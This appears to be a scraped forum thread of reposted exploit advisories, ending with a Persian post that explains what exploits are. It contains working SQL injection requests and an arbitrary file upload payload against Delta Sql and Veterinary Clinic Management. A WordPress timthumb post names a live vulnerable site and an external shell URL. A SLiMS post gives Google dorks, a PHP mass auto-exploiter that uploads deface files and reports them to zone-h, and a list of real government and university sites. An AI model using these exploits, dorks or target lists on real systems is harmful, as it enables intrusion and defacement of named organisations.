  12. # Exploit Title: Delta Sql 1.8.2 - Arbitrary File Upload # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://deltasql.sourceforge.net/ # Software Link: https://sourceforge.net/projects/deltasql/files/latest/download # Software Link: http://deltasql.sourceforge.net/deltasql/ # Version: 1.8.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/docs_manage.php?id=1 # # http://localhost/[PATH]/upload/[FILE] POST /[PATH]/docs_upload.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/[PATH]/docs_manage.php?id=1 Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0 Connection: keep-alive Content-Type: multipart/form-data; boundary= ---------------------------158943328914318561992147220435 Content-Length: 721 -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="fileToUpload"; filename="Efe.php" Content-Type: application/force-download <?php phpinfo(); ?> -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="submit" Upload File -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="id" 1 -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="version" -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="hasdocs" -----------------------------158943328914318561992147220435-- HTTP/1.1 200 OK Date: Thu, 24 Oct 2018 00:24:27 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 1783 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <html> <body> <form action="http://localhost/[PATH]/docs_upload.php" method="post" enctype="multipart/form-data"> Select document to upload: <input name="fileToUpload" id="fileToUpload" type="file"> <input value="Ver Ayari" name="submit" type="submit"> <input value="1" name="id" type="hidden"> <input value="1'" name="version" type="hidden"> <input value="1" name="hasdocs" type="hidden"> </form> </body> </html>
  13. Exploit Title: Delta Sql 1.8.2 - 'id' SQL Injection # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://deltasql.sourceforge.net/ # Software Link: https://sourceforge.net/projects/deltasql/files/latest/download # Software Link: http://deltasql.sourceforge.net/deltasql/ # Version: 1.8.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/docs_manage.php?id=[SQL]&version=1&hasdocs=1 GET /[PATH]/docs_manage.php?id=1++uNiOn+seleCt+0x31,0x32,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),0x34,0x35--+-&version=1&hasdocs=1 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 24 Oct 2018 00:12:57 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/list_project_modules.php?id=[SQL]&name=1 GET /[PATH]/list_project_modules.php?id=-1%20union%20select%20null,(0x32),null--&name=1 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 24 Oct 2018 00:08:03 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2150 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  14. # Exploit Title: Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://vetclinic.sourceforge.io/ # Software Link: https://sourceforge.net/projects/vetclinic/files/latest/download # Version: 00.02 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/petmaint.php?editpetnum=[SQL] # # [PATH]/petmaint.php # .... #154 $editpetnum = ""; #155 #156 if(isset($_POST["editpetnum"])) { #157 $editpetnum = $_POST["editpetnum"]; #158 unset($_POST["editpetnum"]); #159 } #160 else if(isset($_GET["editpetnum"])) { #161 $editpetnum = $_GET["editpetnum"]; #162 unset($_GET["editpetnum"]); #163 } # .... GET /[PATH]/petmaint.php?editpetnum=-0x496873616e2053656e63616e+UniOn++SeLect++0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2cCONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:18:01 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Set-Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/procmaint.php?proccode=[SQL] # # [PATH]/procmaint.php # .... #28 require_once "includes/common.inc"; #29 $emplnumber = $_SESSION['employeenumber']; #30 $display = "ProcMaint:".$emplnumber; #31 if(isset($_GET["proccode"])) { #32 $proccode = $_GET["proccode"]; #33 } else { #34 $proccode = ""; #35 } #36 if ($proccode == "") #37 { # .... GET /[PATH]/procmaint.php?proccode=%27%27%27%27+unioN+selECt++nuLL,nuLL,nuLL,conCAT(0x496873616e2053656e63616e),nuLL--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:22:33 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2697 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  15. # Exploit Title: WordPress aio-shortcodes Plugin - Remote Code Execution # Google Dork: Index of /wp-content/plugins/aio-shortcodes # Exploit: timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php # Date: 26 Oktober 2018 # Author: L4663r666h05t # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php # Version: 1.x.x # Screenshot: http://prntscr.com/lahts7 # Tested on: Windows 10 Pro (x64) Versions Affected: 1.x.x Live Site: http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php Your Shell: http://localhost/wp-content/plugins/aio-shortcodes/cache/md5.php http://localhost/wp-content/plugins/aio-shortcodes/cache/shell.php
  16. #Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Remote File Upload Exploit #Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team #Vendor Homepage : slims.web.id #Software Download Link : github.com/slims/ * slims.web.id/web/ * slims.web.id/goslims/ #Affected Version : 5/6/7 #Tested on : Windows / Linux #Exploit Risk : High #CXSecurity : cxsecurity.com/ascii/WLB-2018050260 #Cyberizm : cyberizm.org/cyberizm-slims-senayan-library-management-system-indo-exploit.html ############################################################################################################## # Long Exploit Title : Slims CMS Senayan OpenSource Library Management System The Winner in the Category of OSS Indonesia ICT Award 2009 Arbitrary File Upload Vulnerability and Auto Exploiter #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit Description : SLiMS (Senayan Library Management System) is a free and open source Library Management System. It is build on free and open source technology like PHP and MySQL. SLiMS provides many features such as bibliography database, circulation, membership management and many more that will help "automating" library tasks. Features : Online Public Access Catalog (OPAC) with thumbnail document image support (can be use for book cover), Simple Search and Advanced Search mode Digital contents/files (PDF, DOC, RTF, XLS, PPT, Video, Audio, etc.) attachment in each bibliographic record support Documents record detail in MODS (Metadata Object Description Schema) XML format RSS (Really Simple Syndication) XML format for OPAC OAI-PMH (Open Archives Initiative Protocol for Metadata Harvesting) in Dublin Core format for metadata harvesting purpose Bibliographic/catalog database management with book cover image support Serial publication control Document items (book copies) management with barcode support Master Files management to manages document referential data such as GMD, Collection Types, Publishers, Authors, Locations, Authors and Suppliers Circulation support with following sub-features : Loan and Return transaction Collections reservation Quick return Configurable and flexible Loan Rules Membership management Stock Taking module to help Stock Op name process in library Reporting and Statistics System modules with following sub-features : Global system configuration Modules management Application Users and Groups management Holiday settings Barcodes generator utility Database backup utility Responsive user interface 3rd party bibliographic records indexing support with Sphinx Search and MongoDB Demo Version : softaculous.com/softaculous/demos/SLiMS Admin Username: admin Admin Password: pass ############################################################################################################## #Slims CMS Senayan OpenSource Library Management System File Attachment Arbitrary File Upload Vulnerability Original Affected Code Here => # Example Affected Code from slims5_meranti [ Original Vulnerability Code ] => [/code]<?php /** * Copyright (C) 2007,2008 Arie Nugraha (dicarve@yahoo.com) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * */ /* Biblio file Adding Pop Windows */ // key to authenticate define('INDEX_AUTH', '1'); // key to get full database access define('DB_ACCESS', 'fa'); // main system configuration require '../../../sysconfig.inc.php'; // IP based access limitation require LIB_DIR.'ip_based_access.inc.php'; do_checkIP('smc'); do_checkIP('smc-bibliography'); // start the session require SENAYAN_BASE_DIR.'admin/default/session.inc.php'; require SENAYAN_BASE_DIR.'admin/default/session_check.inc.php'; require SIMBIO_BASE_DIR.'simbio_GUI/table/simbio_table.inc.php'; require SIMBIO_BASE_DIR.'simbio_GUI/form_maker/simbio_form_table.inc.php'; require SIMBIO_BASE_DIR.'simbio_DB/simbio_dbop.inc.php'; require SIMBIO_BASE_DIR.'simbio_FILE/simbio_file_upload.inc.php'; require SIMBIO_BASE_DIR.'simbio_FILE/simbio_directory.inc.php'; // privileges checking $can_write = utility::havePrivilege('bibliography', 'w'); if (!$can_write) { die('<div class="errorBox">'.__('You are not authorized to view this section').'</div>'); } // page title $page_title = 'File Attachment Upload'; // check for biblio ID in url $biblioID = 0; if (isset($_GET['biblioID']) AND $_GET['biblioID']) { $biblioID = (integer)$_GET['biblioID']; } // check for file ID in url $fileID = 0; if (isset($_GET['fileID']) AND $_GET['fileID']) { $fileID = (integer)$_GET['fileID']; } // start the output buffer ob_start(); /* main content */ // biblio topic save proccess if (isset($_POST['upload']) AND trim(strip_tags($_POST['fileTitle'])) != '') { $uploaded_file_id = 0; $title = trim(strip_tags($_POST['fileTitle'])); $url = trim(strip_tags($_POST['fileURL'])); // create new sql op object $sql_op = new simbio_dbop($dbs); // FILE UPLOADING if (isset($_FILES['file2attach']) AND $_FILES['file2attach']['size']) { // create upload object $file_dir = trim($_POST['fileDir']); $file_upload = new simbio_file_upload(); $file_upload->setAllowableFormat($sysconf['allowed_file_att']); $file_upload->setMaxSize($sysconf['max_upload']*1024); $file_upload->setUploadDir(REPO_BASE_DIR.DIRECTORY_SEPARATOR.str_replace('/', DIRECTORY_SEPARATOR, $file_dir)); $file_upload_status = $file_upload->doUpload('file2attach'); if ($file_upload_status === UPLOAD_SUCCESS) { $file_ext = substr($file_upload->new_filename, strrpos($file_upload->new_filename, '.')+1); $fdata['uploader_id'] = $_SESSION['uid']; $fdata['file_title'] = $dbs->escape_string($title); $fdata['file_name'] = $dbs->escape_string($file_upload->new_filename); $fdata['file_url'] = $dbs->escape_string($url); $fdata['file_dir'] = $dbs->escape_string($file_dir); $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc']))); $fdata['mime_type'] = $sysconf['mimetype'][$file_ext]; $fdata['input_date'] = date('Y-m-d H:i:s'); $fdata['last_update'] = $fdata['input_date']; // insert file data to database @$sql_op->insert('files', $fdata); $uploaded_file_id = $sql_op->insert_id; utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' upload file ('.$file_upload->new_filename.')'); } else { echo '<script type="text/javascript">'; echo 'alert(\''.__('Upload FAILED! Forbidden file type or file size too big!').'\');'; echo 'self.close();'; echo '</script>'; die(); } } else { if ($url && preg_match('@^(http|https|ftp|gopher):\/\/@i', $url)) { $fdata['uploader_id'] = $_SESSION['uid']; $fdata['file_title'] = $dbs->escape_string($title); $fdata['file_name'] = $dbs->escape_string($url); $fdata['file_url'] = $dbs->escape_string($fdata['file_name']); $fdata['file_dir'] = 'literal{NULL}'; $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc']))); $fdata['mime_type'] = 'text/uri-list'; $fdata['input_date'] = date('Y-m-d H:i:s'); $fdata['last_update'] = $fdata['input_date']; // insert file data to database @$sql_op->insert('files', $fdata); $uploaded_file_id = $sql_op->insert_id; } } // BIBLIO FILE RELATION DATA UPDATE // check if biblio_id POST var exists if (isset($_POST['updateBiblioID']) AND !empty($_POST['updateBiblioID'])) { $updateBiblioID = (integer)$_POST['updateBiblioID']; $data['biblio_id'] = $updateBiblioID; $data['file_id'] = $uploaded_file_id; $data['access_type'] = trim($_POST['accessType']); $data['access_limit'] = 'literal{NULL}'; // parsing member type data if ($data['access_type'] == 'public') { $groups = ''; if (isset($_POST['accLimit']) AND count($_POST['accLimit']) > 0) { $groups = serialize($_POST['accLimit']); } else { $groups = 'literal{NULL}'; } $data['access_limit'] = trim($groups); } if (isset($_POST['updateFileID'])) { $fileID = (integer)$_POST['updateFileID']; // file biblio access update $update1 = $sql_op->update('biblio_attachment', array('access_type' => $data['access_type'], 'access_limit' => $data['access_limit']), 'biblio_id='.$updateBiblioID.' AND file_id='.$fileID); // file description update $update2 = $sql_op->update('files', array('file_title' => $title, 'file_url' => $url, 'file_desc' => $dbs->escape_string(trim($_POST['fileDesc']))), 'file_id='.$fileID); if ($update1) { echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment data updated!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$updateBiblioID.'\');'; echo '</script>'; } else { utility::jsAlert(''.__('File Attachment data FAILED to update!').''."\n".$sql_op->error); } } else { if ($sql_op->insert('biblio_attachment', $data)) { echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$data['biblio_id'].'\');'; echo '</script>'; } else { utility::jsAlert(''.__('File Attachment data FAILED to save!').''."\n".$sql_op->error); } } utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' updating file attachment data'); } else { if ($uploaded_file_id) { // add to session array $fdata['file_id'] = $uploaded_file_id; $fdata['access_type'] = trim($_POST['accessType']); $_SESSION['biblioAttach'][$uploaded_file_id] = $fdata; echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php\');'; echo '</script>'; } } } // create new instance $form = new simbio_form_table('mainForm', $_SERVER['PHP_SELF'].'?biblioID='.$biblioID, 'post'); $form->submit_button_attr = 'name="upload" value="'.__('Upload Now').'" class="button"'; // form table attributes $form->table_attr = 'align="center" id="dataList" cellpadding="5" cellspacing="0"'; $form->table_header_attr = 'class="alterCell" style="font-weight: bold;"'; $form->table_content_attr = 'class="alterCell2"'; // query $file_attach_q = $dbs->query("SELECT fl.*, batt.* FROM files AS fl LEFT JOIN biblio_attachment AS batt ON fl.file_id=batt.file_id WHERE batt.biblio_id=$biblioID AND batt.file_id=$fileID"); $file_attach_d = $file_attach_q->fetch_assoc(); // edit mode if ($file_attach_d['biblio_id'] AND $file_attach_d['file_id']) { $form->addHidden('updateBiblioID', $file_attach_d['biblio_id']); $form->addHidden('updateFileID', $file_attach_d['file_id']); } else if ($biblioID) { $form->addHidden('updateBiblioID', $biblioID); } // file title $form->addTextField('text', 'fileTitle', __('Title').'*', $file_attach_d['file_title'], 'style="width: 95%; overflow: auto;"'); // file attachment if ($file_attach_d['file_name']) { $form->addAnything('Attachment', $file_attach_d['file_dir'].'/'.$file_attach_d['file_name']); } else { // file upload dir // create simbio directory object $repo = new simbio_directory(REPO_BASE_DIR); $repo_dir_tree = $repo->getDirectoryTree(5); $repodir_options[] = array('', __('Repository ROOT')); if (is_array($repo_dir_tree)) { // sort array by index ksort($repo_dir_tree); // loop array foreach ($repo_dir_tree as $dir) { $repodir_options[] = array($dir, $dir); } } // add repo directory options to select list $form->addSelectList('fileDir', __('Repo. Directory'), $repodir_options); // file upload $str_input = simbio_form_element::textField('file', 'file2attach'); $str_input .= ' Maximum '.$sysconf['max_upload'].' KB'; $form->addAnything(__('File To Attach'), $str_input); } // file url $form->addTextField('textarea', 'fileURL', __('URL'), $file_attach_d['file_url'], 'rows="1" style="width: 100%; overflow: auto;"'); // file description $form->addTextField('textarea', 'fileDesc', __('Description'), $file_attach_d['file_desc'], 'rows="2" style="width: 100%; overflow: auto;"'); // file access $acctype_options[] = array('public', __('Public')); $acctype_options[] = array('private', __('Private')); $form->addSelectList('accessType', __('Access'), $acctype_options, $file_attach_d['access_type']); // file access limit if set to public $group_query = $dbs->query('SELECT member_type_id, member_type_name FROM mst_member_type'); $group_options = array(); while ($group_data = $group_query->fetch_row()) { $group_options[] = array($group_data[0], $group_data[1]); } $form->addCheckBox('accLimit', __('Access Limit by Member Type'), $group_options, !empty($file_attach_d['access_limit'])?unserialize($file_attach_d['access_limit']):null ); // print out the object echo $form->printOut(); /* main content end */ $content = ob_get_clean(); // include the page template require SENAYAN_BASE_DIR.'/admin/'.$sysconf['admin_template']['dir'].'/notemplate_page_tpl.php';[/code] ############################################################################################################## #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit #Google Dork 1 : intext:''The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id #Google Dork 3 : inurl:''/slims5-meranti/'' site:id #Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 5 : Powered by SLiMS site:id #Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii #Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan. #Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog. #Google Dork 9 : SLiMS (Senayan Library Management System) is an open source Library Management System. It is build on Open source technology like PHP and MySQL. #Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly This software and this template are released Under GNU GPL License Version 3 #Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id #Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog #Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library. #Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue) #Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id #Google Dork 16 : Senayan | Open Source Library Management System :: OPAC Note : Use your brain to find more dorks. Note : Please upgrade and update your site on the latest versions of SLİMS Senayan Library Management System and do not let special characters or add admin in the next version. #Exploit Code : ..../admin/modules/bibliography/pop_attach.php #Path : /repository/.... # Note : Fill the form and choose your file and upload it. # Allowed File Extensions : txt jpg gif png #Indonesian Government / Education Sites are vulnerable for this issue. #Attackers can exploit this issue via a browser or with Auto PHP Exploiter tool. ############################################################################################################## #Auto Exploiter PHP Code => [code]<?php /* # KingSkrupellos from Cyberizm Digital Security Team # Our Security Forum : cyberizm.org # Twitter : twitter.com/kngskrplls # your list.txt must a single directory with this exploiter # ############################################### # This Exploit and Vulnerability was discovered by KingSkrupellos # Thanks for All Moslem Hackers and Cyberizm Digital Security Team # This Exploiter may sometimes couldn't work %100 because sometimes the bot don't understand the command. # If the command don't understand the command, please exploit it manually. # Special thanks : All Moslem Hackers and Cyberizm Digital Security Team ################################################# # note : Please do not remove Cyberizm copyright. # This Exploit Coded By KingSkrupellos from Cyberizm Digital Security Team */ echo " File Attachment Auto Exploiter - coded by KingSkrupellos $ Thanks for All Moslem Hackers and Cyberizm Digital Security Team "; echo "Input your target list: "; $list = trim(fgets(STDIN)); $shell = "yourdefacefilename.txt"; $nickzoneh = "KingSkrupellos"; $exploit = "/admin/modules/bibliography/pop_attach.php"; $path = "/repository/"; $open = fopen("$list","r"); $size = filesize("$list"); $read = fread($open,$size); $lists = explode("\r\n",$read); echo "\n"; foreach($lists as $target){ if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){ $targets = "http://$target"; }else{ $targets = $target; } echo "Target => $targets\n"; echo " [*] Checking Path : "; $cd = curl_init("$targets$exploit"); curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1); curl_exec($cd); $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE); curl_close($cd); if($httpcode == 200){ echo "200 OK\n"; echo " [*] Uploading shell : "; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$targets/$exploit"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, array("fileTitle"=>"CyBeRiZM" , "file2attach"=>"@$shell" , "upload"=>"Unggah Sekarang")); curl_exec($ch); $cek = curl_init(); curl_setopt($cek, CURLOPT_URL, "$targets$path$shell"); curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1); $ceek = curl_exec($cek); $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE); if(preg_match("/hacked/",$ceek) or $ceeks == 200){ echo "OK $targets$path$shell\n"; echo " [*] Zone-H : "; $zh = curl_init("http://zone-h.org/notify/single"); curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1); curl_setopt($zh, CURLOPT_POST, 1); curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5")); $postzh = curl_exec($zh); if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){ echo "OK\n\n"; }else{ echo "NO\n\n"; } }else{ echo "Failed\n\n"; } }else{ echo "Not Vulnerable\n\n"; } }[/code] Important Note : Only .txt .jpg .gif .png files are allowed. # Uploaded File Directory Path : TARGET/PATH/repository/.... TARGET/repository/.... ############################################################################################################## # Example Sites : # perpustakaan.pn-bangli.go.id/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/dAL3j => archive.is/Ott9S # pta-banjarmasin.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/lPDdv => archive.is/BNiKP # pn-singaraja.go.id/opac/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/veBCj - archive.is/GEOy6 pn-singaraja.go.id/opac/admin/modules/bibliography/pop_attach.php pa-kualatungkal.go.id/pustaka/admin/modules/bibliography/pop_attach.php pta-banjarmasin.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php pn-bangil.go.id/perpustakaan/data/admin/modules/bibliography/pop_attach.php pn-tabanan.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php perpustakaan.pn-balige.go.id/admin/modules/bibliography/pop_attach.php docrepository.undana.ac.id/admin/modules/bibliography/pop_attach.php digilib.stimata.ac.id/admin/modules/bibliography/pop_attach.php pustaka.pusair-pu.go.id/akasia/admin/modules/bibliography/pop_attach.php perpustakaan.pn-donggala.go.id/admin/modules/bibliography/pop_attach.php perpustakaan.stikes-paguwarmas.ac.id/admin/modules/bibliography/pop_attach.php opac.staiattanwir.ac.id/repository/admin/modules/bibliography/pop_attach.php opac.lib.idu.ac.id/library_unhan/admin/modules/bibliography/pop_attach.php www.perpustakaanbalitsereal.com/admin/modules/bibliography/pop_attach.php epository.hafshawaty.ac.id/admin/modules/bibliography/pop_attach.php perpusffup.univpancasila.ac.id/admin/modules/bibliography/pop_attach.php perpus.stikesmedikacikarang.ac.id/slim/admin/modules/bibliography/pop_attach.php rbaca.bukitasamfoundation.com/perpustakaan/admin/modules/bibliography/pop_attach.php e-library.darunnajah.ac.id/admin/modules/bibliography/pop_attach.php ############################################################################################################## # Discovered By Hacker KingSkrupellos from Cyberizm Digital Security Technological Turkish Moslem Army ##############################################################################################################
  17. Rednofozi

    Hacking Exploit چیست ؟

    اکسپلویت ها (Exploit) یا کدهای مخرب برای سوء استفاده از حفره های امنیتی در برنامه های کاربردی، سیستم عامل ها، هسته سیستم عامل ها، وب سرورها، سخت افزارها و در کل هر نرم افزاری که در یک شبکه و یا کامپیوتر کار میکند نوشته میشود. این کدها و برنامه ها لزما برای خرابکاری نوشته و منتشر نمیشوند و بعضی ها در جهت اهداف تحقیقاتی و آموزشی نوشته میشوند، هر چند استفاده از این کدها برای نفوذ به سیستم های کاربران امری متداول میباشد. اکسپلویت ها میتوانند با زبان های مختلف برنامه نویسی نوشته شوند و هدف آنها استفاده و ایجاد دسترسی غیر مجاز، ایجاد حملات مختلف و یا اختلال در سیستم های کامپیوتری میباشد. اکسپلویت ها معمولا هنگام کشف آسیب پذیری ها و یا بعد از کشف حفره های امنیتی نوشته میشوند، اکسپلویت نویس ها عمدتا هکر میباشند که با تکنیک ها و متدهای مختلف اقدام به نوشتن کدهای مخرب مینمایند، بعضا دیده میشود که متخصصان و مدیران امنیتی مطرح نیز اقدام به نوشتن اکسپلویت، برای اثبات آسیب پذیری های مهم کرده اند. اکسپلویت ها به زبانهای مختلف و در دسته بندی های مختلف عرضه میشوند. اکسپلویت ها عمدتا به زبانهای C++، Perl و یا PHP و Python نوشته میشوند، ولی بسته به نوع آسیب پذیری و بستر آسیب پذیر متغییر میباشند، برای مثال زبانی که اکسپلویت های معروف Metasploit با آن نوشته شده Ruby میباشد. عمده اکسپلویت ها به دو نوع تقسیم بندی 